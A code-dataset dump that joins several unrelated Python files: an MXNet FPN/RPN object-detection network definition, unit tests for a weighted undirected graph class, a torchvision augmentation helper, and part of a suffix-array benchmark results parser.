fpn_p3_1x1 = mx.symbol.Convolution(data=c3, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p3_1x1')
bn_fpn_p3_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p3_1x1', data=fpn_p3_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p3_1x1_relu = mx.symbol.Activation(name='bn_fpn_p3_1x1_relu', data=bn_fpn_p3_1x1, act_type='relu')
fpn_p2_1x1 = mx.symbol.Convolution(data=c2, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p2_1x1')
bn_fpn_p2_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p2_1x1', data=fpn_p2_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p2_1x1_relu = mx.symbol.Activation(name='bn_fpn_p2_1x1_relu', data=bn_fpn_p2_1x1, act_type='relu')
fpn_p1_1x1 = mx.symbol.Convolution(data=c1, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p1_1x1')
bn_fpn_p1_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p1_1x1', data=fpn_p1_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p1_1x1_relu = mx.symbol.Activation(name='bn_fpn_p1_1x1_relu', data=bn_fpn_p1_1x1, act_type='relu')
fpn_p0_1x1 = mx.symbol.Convolution(data=c0, kernel=(1, 1), pad=(0, 0), stride=(1, 1), num_filter=feature_dim, name='fpn_p0_1x1')
bn_fpn_p0_1x1 = mx.symbol.BatchNorm(name='bn_fpn_p0_1x1', data=fpn_p0_1x1, use_global_stats=True, fix_gamma=False, eps=eps)
bn_fpn_p0_1x1_relu = mx.symbol.Activation(name='bn_fpn_p0_1x1_relu', data=bn_fpn_p0_1x1, act_type='relu')
# top-down connection
_kernel=(4,4)
_stride=(2,2)
_pad=(1,1)
fpn_p5_deconv = mx.symbol.Deconvolution(bn_fpn_p5_1x1_relu,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p5_deconv')
fpn_p4_plus = mx.sym.ElementWiseSum(*[fpn_p5_deconv, bn_fpn_p4_1x1_relu], name='fpn_p4_sum')
fpn_p4_deconv = mx.symbol.Deconvolution(fpn_p4_plus,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p4_deconv')
fpn_p3_plus = mx.sym.ElementWiseSum(*[fpn_p4_deconv, bn_fpn_p3_1x1_relu], name='fpn_p3_sum')
fpn_p3_deconv = mx.symbol.Deconvolution(fpn_p3_plus,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p3_deconv')
fpn_p2_plus = mx.sym.ElementWiseSum(*[fpn_p3_deconv, bn_fpn_p2_1x1_relu], name='fpn_p2_sum')
fpn_p2_deconv = mx.symbol.Deconvolution(fpn_p2_plus,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p2_deconv')
fpn_p1_plus = mx.sym.ElementWiseSum(*[fpn_p2_deconv, bn_fpn_p1_1x1_relu], name='fpn_p1_sum')
fpn_p1_deconv = mx.symbol.Deconvolution(fpn_p1_plus,kernel=_kernel, stride=_stride,pad=_pad,num_filter=feature_dim,name='fpn_p1_deconv')
fpn_p0_plus = mx.sym.ElementWiseSum(*[fpn_p1_deconv, bn_fpn_p0_1x1_relu], name='fpn_p0_sum')
# FPN feature
fpn_p6 = mx.sym.Convolution(data=c5, kernel=(3, 3), pad=(1, 1), stride=(2, 2), num_filter=feature_dim, name='fpn_p6')
'''
fpn_p5 = mx.symbol.Convolution(data=fpn_p5_1x1, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p5')
fpn_p4 = mx.symbol.Convolution(data=fpn_p4_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p4')
fpn_p3 = mx.symbol.Convolution(data=fpn_p3_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p3')
fpn_p2 = mx.symbol.Convolution(data=fpn_p2_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p2')
fpn_p1 = mx.symbol.Convolution(data=fpn_p1_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p1')
'''
fpn_p0 = mx.symbol.Convolution(data=fpn_p0_plus, kernel=(3, 3), pad=(1, 1), stride=(1, 1), num_filter=feature_dim, name='fpn_p0')
return fpn_p0,fpn_p6#,fpn_p5#, fpn_p1, fpn_p2, fpn_p3, fpn_p4, fpn_p5,
def get_rpn_subnet(self, data, num_anchors, suffix):
rpn_conv = mx.sym.Convolution(data=data, kernel=(3, 3), pad=(1, 1), num_filter=128, name='rpn_conv_' + suffix,
weight=self.shared_param_dict['rpn_conv_weight'], bias=self.shared_param_dict['rpn_conv_bias'])
rpn_relu = mx.sym.Activation(data=rpn_conv, act_type='relu', name='rpn_relu_' + suffix)
rpn_cls_score = mx.sym.Convolution(data=rpn_relu, kernel=(1, 1), pad=(0, 0), num_filter=2 * num_anchors, name='rpn_cls_score_' + suffix,
weight=self.shared_param_dict['rpn_cls_score_weight'], bias=self.shared_param_dict['rpn_cls_score_bias'])
rpn_bbox_pred = mx.sym.Convolution(data=rpn_relu, kernel=(1, 1), pad=(0, 0), num_filter=4 * num_anchors, name='rpn_bbox_pred_' + suffix,
weight=self.shared_param_dict['rpn_bbox_pred_weight'], bias=self.shared_param_dict['rpn_bbox_pred_bias'])
# n x (2*A) x H x W => n x 2 x (A*H*W)
rpn_cls_score_t1 = mx.sym.Reshape(data=rpn_cls_score, shape=(0, 2, -1, 0), name='rpn_cls_score_t1_' + suffix)
rpn_cls_score_t2 = mx.sym.Reshape(data=rpn_cls_score_t1, shape=(0, 2, -1), name='rpn_cls_score_t2_' + suffix)
rpn_cls_prob = mx.sym.SoftmaxActivation(data=rpn_cls_score_t1, mode='channel', name='rpn_cls_prob_' + suffix)
rpn_cls_prob_t = mx.sym.Reshape(data=rpn_cls_prob, shape=(0, 2 * num_anchors, -1, 0), name='rpn_cls_prob_t_' + suffix)
rpn_bbox_pred_t = mx.sym.Reshape(data=rpn_bbox_pred, shape=(0, 0, -1), name='rpn_bbox_pred_t_' + suffix)
return rpn_cls_score_t2, rpn_cls_prob_t, rpn_bbox_pred_t, rpn_bbox_pred
def get_symbol(self, cfg, is_train=True):
# config alias for convenient
num_classes = cfg.dataset.NUM_CLASSES
num_reg_classes = (2 if cfg.CLASS_AGNOSTIC else num_classes)
data = mx.sym.Variable(name="data")
im_info = mx.sym.Variable(name="im_info")
# shared convolutional layers
res0, res1, res2, res3, res4, res5 = self.get_resnet_backbone(data)
#fpn_p0, fpn_p1, fpn_p2, fpn_p3, fpn_p4, fpn_p5, fpn_p6 = self.get_fpn_feature(res0, res1, res2, res3, res4, res5)
fpn_p0,fpn_p6 = self.get_fpn_feature(res0, res1, res2, res3, res4, res5)
#fpn_p0, fpn_p1, fpn_p2, fpn_p3,fpn_p4 = self.get_fpn_feature(res0, res1, res2, res3, res4, res5)
#rpn_cls_score_p0, rpn_prob_p0, rpn_bbox_loss_p0, rpn_bbox_pred_p0 = self.get_rpn_subnet(fpn_p0, cfg.network.NUM_ANCHORS, 'p0')
#rpn_cls_score_p1, rpn_prob_p1, rpn_bbox_loss_p1, rpn_bbox_pred_p1 = self.get_rpn_subnet(fpn_p1, cfg.network.NUM_ANCHORS, 'p1')
#rpn_cls_score_p2, rpn_prob_p2, rpn_bbox_loss_p2, rpn_bbox_pred_p2 = self.get_rpn_subnet(fpn_p2, cfg.network.NUM_ANCHORS, 'p2')
#rpn_cls_score_p3, rpn_prob_p3, rpn_bbox_loss_p3, rpn_bbox_pred_p3 = self.get_rpn_subnet(fpn_p3, cfg.network.NUM_ANCHORS, 'p3')
#rpn_cls_score_p4, rpn_prob_p4, rpn_bbox_loss_p4, rpn_bbox_pred_p4 = self.get_rpn_subnet(fpn_p4, cfg.network.NUM_ANCHORS, 'p4')
#rpn_cls_score_p5, rpn_prob_p5, rpn_bbox_loss_p5, rpn_bbox_pred_p5 = self.get_rpn_subnet(fpn_p5, cfg.network.NUM_ANCHORS, 'p5')
rpn_cls_score_p6, rpn_prob_p6, rpn_bbox_loss_p6, rpn_bbox_pred_p6 = self.get_rpn_subnet(fpn_p6, cfg.network.NUM_ANCHORS, 'p6')
rpn_cls_prob_dict = {
'rpn_cls_prob_stride64': rpn_prob_p6,
#'rpn_cls_prob_stride32': rpn_prob_p5,
#'rpn_cls_prob_stride16': rpn_prob_p4,
#'rpn_cls_prob_stride8': rpn_prob_p3,
#'rpn_cls_prob_stride4': rpn_prob_p2,
#'rpn_cls_prob_stride2': rpn_prob_p1,
#'rpn_cls_prob_stride1': rpn_prob_p0,
}
rpn_bbox_pred_dict = {
'rpn_bbox_pred_stride64': rpn_bbox_pred_p6,
#'rpn_bbox_pred_stride32': rpn_bbox_pred_p5,
#'rpn_bbox_pred_stride16': rpn_bbox_pred_p4,
#'rpn_bbox_pred_stride8': rpn_bbox_pred_p3,
#'rpn_bbox_pred_stride4': rpn_bbox_pred_p2,
#'rpn_bbox_pred_stride2': rpn_bbox_pred_p1,
#'rpn_bbox_pred_stride1': rpn_bbox_pred_p0,
}
arg_dict = dict(rpn_cls_prob_dict.items() + rpn_bbox_pred_dict.items())
if is_train:
rpn_label = mx.sym.Variable(name='label')
rpn_bbox_target = mx.sym.Variable(name='bbox_target')
rpn_bbox_weight = mx.sym.Variable(name='bbox_weight')
gt_boxes = mx.sym.Variable(name="gt_boxes")
#rpn_cls_score = mx.sym.Concat(rpn_cls_score_p0,rpn_cls_score_p1,rpn_cls_score_p2, rpn_cls_score_p3, rpn_cls_score_p4, rpn_cls_score_p5, rpn_cls_score_p6, dim=2)
#rpn_bbox_loss = mx.sym.Concat(rpn_bbox_loss_p0,rpn_bbox_loss_p1,rpn_bbox_loss_p2, rpn_bbox_loss_p3, rpn_bbox_loss_p4, rpn_bbox_loss_p5, rpn_bbox_loss_p6, dim=2)
rpn_cls_score = mx.sym.Concat(rpn_cls_score_p6,dim=2)
rpn_bbox_loss = mx.sym.Concat(rpn_bbox_loss_p6,dim=2)
# RPN classification loss
rpn_cls_output = mx.sym.SoftmaxOutput(data=rpn_cls_score, label=rpn_label, multi_output=True, normalization='valid',
use_ignore=True, ignore_label=-1, name='rpn_cls_prob')
# bounding box regression
rpn_bbox_loss = rpn_bbox_weight * mx.sym.smooth_l1(name='rpn_bbox_loss_l1', scalar=3.0, data=(rpn_bbox_loss - rpn_bbox_target))
rpn_bbox_loss = mx.sym.MakeLoss(name='rpn_bbox_loss', data=rpn_bbox_loss, grad_scale=1.0 / cfg.TRAIN.RPN_BATCH_SIZE)
aux_dict = {
'op_type': 'pyramid_proposal', 'name': 'rois',
'im_info': im_info, 'feat_stride': tuple(cfg.network.RPN_FEAT_STRIDE),
'scales': tuple(cfg.network.ANCHOR_SCALES), 'ratios': tuple(cfg.network.ANCHOR_RATIOS),
'rpn_pre_nms_top_n': cfg.TRAIN.RPN_PRE_NMS_TOP_N, 'rpn_post_nms_top_n': cfg.TRAIN.RPN_POST_NMS_TOP_N,
'threshold': cfg.TRAIN.RPN_NMS_THRESH, 'rpn_min_size': cfg.TRAIN.RPN_MIN_SIZE
}
# ROI proposal
rois = mx.sym.Custom(**dict(arg_dict.items() + aux_dict.items()))
# ROI proposal target
gt_boxes_reshape = mx.sym.Reshape(data=gt_boxes, shape=(-1, 5), name='gt_boxes_reshape')
rois, label, bbox_target, bbox_weight \
= mx.sym.Custom(rois=rois, gt_boxes=gt_boxes_reshape, op_type='proposal_target', num_classes=num_reg_classes, batch_images=cfg.TRAIN.BATCH_IMAGES,
batch_rois=cfg.TRAIN.BATCH_ROIS, cfg=cPickle.dumps(cfg), fg_fraction=cfg.TRAIN.FG_FRACTION)
else:
aux_dict = {
'op_type': 'pyramid_proposal', 'name': 'rois',
'im_info': im_info, 'feat_stride': tuple(cfg.network.RPN_FEAT_STRIDE),
'scales': tuple(cfg.network.ANCHOR_SCALES), 'ratios': tuple(cfg.network.ANCHOR_RATIOS),
'rpn_pre_nms_top_n': cfg.TEST.RPN_PRE_NMS_TOP_N, 'rpn_post_nms_top_n': cfg.TEST.RPN_POST_NMS_TOP_N,
'threshold': cfg.TEST.RPN_NMS_THRESH, 'rpn_min_size': cfg.TEST.RPN_MIN_SIZE
}
# ROI proposal
rois = mx.sym.Custom(**dict(arg_dict.items() + aux_dict.items()))
roi_pool = mx.symbol.Custom(data_p0=fpn_p0,
rois=rois, op_type='fpn_roi_pooling', name='fpn_roi_pooling', feat_strides = '(1)')
# 2 fc
fc_new_1 = mx.symbol.FullyConnected(name='fc_new_1', data=roi_pool, num_hidden=1024)
fc_new_1_relu = mx.sym.Activation(data=fc_new_1, act_type='relu', name='fc_new_1_relu')
fc_new_2 = mx.symbol.FullyConnected(name='fc_new_2', data=fc_new_1_relu, num_hidden=1024)
fc_new_2_relu = mx.sym.Activation(data=fc_new_2, act_type='relu', name='fc_new_2_relu')
# cls_score/bbox_pred
cls_score = mx.symbol.FullyConnected(name='cls_score', data=fc_new_2_relu, num_hidden=num_classes)
bbox_pred = mx.symbol.FullyConnected(name='bbox_pred', data=fc_new_2_relu, num_hidden=num_reg_classes * 4)
if is_train:
if cfg.TRAIN.ENABLE_OHEM:
labels_ohem, bbox_weights_ohem = mx.sym.Custom(op_type='BoxAnnotatorOHEM', num_classes=num_classes,
num_reg_classes=num_reg_classes, roi_per_img=cfg.TRAIN.BATCH_ROIS_OHEM,
cls_score=cls_score, bbox_pred=bbox_pred, labels=label,
bbox_targets=bbox_target, bbox_weights=bbox_weight)
cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=labels_ohem, normalization='valid', use_ignore=True, ignore_label=-1)
bbox_loss_ = bbox_weights_ohem * mx.sym.smooth_l1(name='bbox_loss_', scalar=1.0, data=(bbox_pred - bbox_target))
bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_, grad_scale=1.0 / cfg.TRAIN.BATCH_ROIS_OHEM)
rcnn_label = labels_ohem
elif cfg.TRAIN.ENABLE_FOCAL_LOSS:
cls_prob = mx.sym.Custom(op_type='FocalLoss', name='cls_prob', data=cls_score, labels=label, gamma= 2,alpha = 0.25)
# cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=label, normalization='valid')
bbox_loss_ = bbox_weight * mx.sym.smooth_l1(name='bbox_loss_', scalar=1.0,
data=(bbox_pred - bbox_target))
bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_, grad_scale=1.0 / cfg.TRAIN.BATCH_ROIS)
#bbox_loss = mx.sym.Custom(op_type='FocalLoss', name='cls_prob', data=bbox_pred, labels=bbox_target, gamma= 2,alpha = 0.25)
rcnn_label = label
else:
cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=label, normalization='valid')
bbox_loss_ = bbox_weight * mx.sym.smooth_l1(name='bbox_loss_', scalar=1.0, data=(bbox_pred - bbox_target))
bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_, grad_scale=1.0 / cfg.TRAIN.BATCH_ROIS)
rcnn_label = label
# reshape output
rcnn_label = mx.sym.Reshape(data=rcnn_label, shape=(cfg.TRAIN.BATCH_IMAGES, -1), name='label_reshape')
cls_prob = mx.sym.Reshape(data=cls_prob, shape=(cfg.TRAIN.BATCH_IMAGES, -1, num_classes), name='cls_prob_reshape')
bbox_loss = mx.sym.Reshape(data=bbox_loss, shape=(cfg.TRAIN.BATCH_IMAGES, -1, 4 * num_reg_classes), name='bbox_loss_reshape')
# group = mx.sym.Group([rpn_cls_output, rpn_bbox_loss, mx.sym.BlockGrad(cls_prob), mx.sym.BlockGrad(bbox_loss), mx.sym.BlockGrad(rcnn_label)])
group = mx.sym.Group([rpn_cls_output, rpn_bbox_loss, cls_prob, bbox_loss, mx.sym.BlockGrad(rcnn_label)])
else:
cls_prob = mx.sym.SoftmaxActivation(name='cls_prob', data=cls_score)
cls_prob = mx.sym.Reshape(data=cls_prob, shape=(cfg.TEST.BATCH_IMAGES, -1, num_classes), name='cls_prob_reshape')
bbox_pred = mx.sym.Reshape(data=bbox_pred, shape=(cfg.TEST.BATCH_IMAGES, -1, 4 * num_reg_classes), name='bbox_pred_reshape')
group = mx.sym.Group([rois, cls_prob, bbox_pred])
self.sym = group
return group
def init_weight_rcnn(self, cfg, arg_params, aux_params):
arg_params['fc_new_1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fc_new_1_weight'])
arg_params['fc_new_1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fc_new_1_bias'])
arg_params['fc_new_2_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fc_new_2_weight'])
arg_params['fc_new_2_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fc_new_2_bias'])
arg_params['cls_score_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['cls_score_weight'])
arg_params['cls_score_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['cls_score_bias'])
arg_params['bbox_pred_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['bbox_pred_weight'])
arg_params['bbox_pred_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['bbox_pred_bias'])
def init_weight_fpn(self, cfg, arg_params, aux_params):
arg_params['fpn_p6_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p6_weight'])
arg_params['fpn_p6_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p6_bias'])
'''
arg_params['fpn_p5_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p5_weight'])
arg_params['fpn_p5_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p5_bias'])
arg_params['fpn_p4_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p4_weight'])
arg_params['fpn_p4_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p4_bias'])
arg_params['fpn_p3_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p3_weight'])
arg_params['fpn_p3_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p3_bias'])
arg_params['fpn_p2_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p2_weight'])
arg_params['fpn_p2_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p2_bias'])
arg_params['fpn_p1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p1_weight'])
arg_params['fpn_p1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p1_bias'])
'''
arg_params['fpn_p0_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p0_weight'])
arg_params['fpn_p0_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p0_bias'])
arg_params['fpn_p5_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p5_1x1_weight'])
arg_params['fpn_p5_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p5_1x1_bias'])
arg_params['fpn_p4_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p4_1x1_weight'])
arg_params['fpn_p4_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p4_1x1_bias'])
arg_params['fpn_p3_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p3_1x1_weight'])
arg_params['fpn_p3_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p3_1x1_bias'])
arg_params['fpn_p2_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p2_1x1_weight'])
arg_params['fpn_p2_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p2_1x1_bias'])
arg_params['fpn_p1_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p1_1x1_weight'])
arg_params['fpn_p1_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p1_1x1_bias'])
arg_params['fpn_p0_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p0_1x1_weight'])
arg_params['fpn_p0_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p0_1x1_bias'])
'''
for i in range(6):
arg_params['bn_fpn_p'+str(i)+'_1x1_gamma'] = mx.nd.ones(shape=self.arg_shape_dict['bn_fpn_p'+str(i)+'_1x1_gamma'])
arg_params['bn_fpn_p'+str(i)+'_1x1_beta'] = mx.nd.zeros(shape=self.arg_shape_dict['bn_fpn_p'+str(i)+'_1x1_beta'])
aux_params['bn_fpn_p'+str(i)+'_1x1_moving_mean'] = mx.nd.zeros(shape=self.aux_shape_dict['bn_fpn_p'+str(i)+'_1x1_moving_mean'])
aux_params['bn_fpn_p'+str(i)+'_1x1_moving_var'] = mx.nd.ones(shape=self.aux_shape_dict['bn_fpn_p'+str(i)+'_1x1_moving_var'])
arg_params['fpn_p5_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p5_deconv_weight'])
#arg_params['fpn_p5_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p5_deconv_bias'])
arg_params['fpn_p4_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p4_deconv_weight'])
#arg_params['fpn_p4_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p4_deconv_bias'])
arg_params['fpn_p3_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p3_deconv_weight'])
#arg_params['fpn_p3_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p3_deconv_bias'])
arg_params['fpn_p2_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p2_deconv_weight'])
#arg_params['fpn_p2_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p2_deconv_bias'])
arg_params['fpn_p1_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p1_deconv_weight'])
#arg_params['fpn_p1_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p1_deconv_bias'])
'''
def init_weight(self, cfg, arg_params, aux_params):
for name in self.shared_param_list:
arg_params[name + '_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict[name + '_weight'])
arg_params[name + '_bias'] = mx.nd.zeros(shape=self.arg_shape_dict[name + '_bias'])
self.init_weight_rcnn(cfg, arg_params, aux_params)
self.init_weight_fpn(cfg, arg_params, aux_params)
| [
"qileimail123@gmail.com"
] | qileimail123@gmail.com |
2b8a1f223adcae70c85c50da499d85bbc1247f9b | bf509536050c01245e27c3e04e366b5b5f426315 | /test/test_graph_wu.py | bb8a4c04514d4d6c3f2dbdbeaf0e093c66c89d51 | [] | no_license | syntronicbraph/Braph-2.0-Python | ad419b70661cd89448f3db500c92df63c7556733 | a58fd0c6ce232eb63930de3d1cb3987747aafca4 | refs/heads/master | 2021-01-16T02:03:08.344897 | 2020-02-25T07:09:08 | 2020-02-25T07:09:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,782 | py | import unittest
from braphy.graph_measures import MeasureParser
from braphy.graph import *
import numpy as np
class TestGraphWU(unittest.TestCase):
def test_binary(self):
measure_list = MeasureParser.list_measures()
A = np.array([[0, 1, 1, 0], [1, 0, 0, 0], [1, 0, 0, 0], [0, 0, 0, 0]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
self.assertFalse(graph.is_binary())
def test_directed(self):
measure_list = MeasureParser.list_measures()
A = np.array([[0, 1, 1, 0], [1, 0, 0, 0], [1, 0, 0, 0], [0, 0, 0, 0]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
self.assertFalse(graph.is_directed())
def test_remove_diagonal(self):
measure_list = MeasureParser.list_measures()
A = np.array([[1, 1, 1, 1], [1, 1, 1, 0], [1, 1, 0, 0], [0, 0, 0, 0]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
for (i, j), value in np.ndenumerate(graph.A):
if(i == j):
self.assertEqual(value, 0)
def test_remove_negative_weights(self):
measure_list = MeasureParser.list_measures()
A = np.array([[1, -1, 1, -1], [1, -1, 1, 0], [-1, 1, 0, 0], [0, 0, 0, 0]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
for (i, j), value in np.ndenumerate(graph.A):
self.assertTrue(value >= 0)
def test_symmetrize(self):
measure_list = MeasureParser.list_measures()
A = np.array([[1, 1, 1, 1], [0, 1, 1, 1], [0, 0, 1, 1], [0, 0, 0, 1]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
for (i, j), value in np.ndenumerate(graph.A):
if(i != j):
self.assertTrue(value > 0)
if __name__ == '__main__':
unittest.main()
| [
"lisjxa@syntronic.com"
] | lisjxa@syntronic.com |
9938592537dabb5771d1f0da8bdbc1a334c441e1 | ee34ec4a6db48437d598496205330b768859a9b7 | /pytorch-scripts/Augmentation.py | 5bc9453ac332ece31b5a4a34589dea7d28b4d42e | [] | no_license | lochana1/kaggle_ConvNet_tinyImagenet | a75f4ad5cc747c3127310103249ca48bdb8ec5fd | 00574dd8519619dd24c3ebcd5ddf788dabf6c877 | refs/heads/master | 2021-01-24T00:04:39.700504 | 2018-02-27T15:23:09 | 2018-02-27T15:23:09 | 122,753,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,262 | py |
from torchvision import transforms
class Augmentation:
def __init__(self,strategy):
print ("Data Augmentation Initialized with strategy %s"%(strategy));
self.strategy = strategy;
def applyTransforms(self):
if self.strategy == "H_FLIP": # horizontal flip with a probability of 0.5
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
elif self.strategy == "H_FLIP_ROTATE": # horizontal flip with a probability of 0.5
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(5),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
elif self.strategy == "SCALE_H_FLIP": # resize to 224*224 and then do a random horizontal flip.
data_transforms = {
'train': transforms.Compose([
transforms.Resize([224,224]),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize([224,224]),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
else :
print ("Please specify correct augmentation strategy : %s not defined"%(self.strategy));
exit();
return data_transforms;
| [
"lochana@tcd.ie"
] | lochana@tcd.ie |
babd152532ef2d5653ea052353810305b7f6f33d | 5580fa2eac9877d54a5bfa17694e8fb310c10cfb | /suffixArray/buildMemoryTable.py | ab381aa813b42f26d86d630bf895c8595ab35250 | [] | no_license | jlabeit/wavelet-suffix-fm-index | c16b37ccad959e647a9f388b0520c98472f11fca | deaa57e92bbfd1596423f4a66c5f138aff43bdb7 | refs/heads/master | 2021-01-20T10:56:28.140141 | 2017-03-31T10:24:07 | 2017-03-31T10:24:07 | 34,020,459 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,326 | py | import csv
sizes = {'abab': 104857600, 'kernel': 257961544, 'dblp.xml.0001.1': 104857600, 'influenza': 154808555, 'dblp.xml.0001.2': 104857600, 'sources.001.2': 104857600, 'proteins.001.1': 104857600, 'sources': 210866603, 'einstein.de.txt': 92758441, 'english.001.2': 104857600, 'dna': 403927746, 'Escherichia_Coli': 112689515, 'world_leaders': 46968181, 'coreutils': 205281760, 'fib41': 267914296, 'english.1024MB': 1073741816, 'dblp.xml': 296135874, 'para': 429265758, 'aabbaabb': 104857600, 'pitches': 55814376, 'dna.001.1': 104857600, 'tm29': 268435456, 'rs.13': 216747218, 'cere': 461286644, 'aaa': 104857600, 'proteins': 1184051855, 'dblp.xml.00001.2': 104857600, 'dblp.xml.00001.1': 104857600}
# Read result data.
def parseRow(row):
return [row[0].strip(), row[1].strip(), int(row[2]), float(row[3]), float(row[4])]
data = []
with open('results', 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in spamreader:
data.append(parseRow(row))
artificial = ('artificial repetitive', ['fib41', 'rs.13', 'tm29'])
real = ('real repetitive', ['Escherichia_Coli', 'cere', 'coreutils', 'einstein.de.txt',
'influenza', 'kernel', 'para', 'world_leaders'])
pseudo= ('pseudo repetitive', ['dblp.xml.00001.1', 'dblp.xml.00001.2', 'dblp.xml.0001.1',
'dblp.xml.0001.2', 'dna.001.1', 'english.001.2', 'proteins.001.1', 'sources.001.2'])
classic = ('non-repetitive', ['sources', 'pitches', 'proteins', 'dna', 'english.1024MB', 'dblp.xml'])
special = ('special cases', ['aaa', 'abab', 'aabbaabb'])
inputs = [classic, real, artificial, pseudo, special]
#threads = [1, 2, 4, 8, 12, 16, 24, 32, 40, 48, 56, 64]
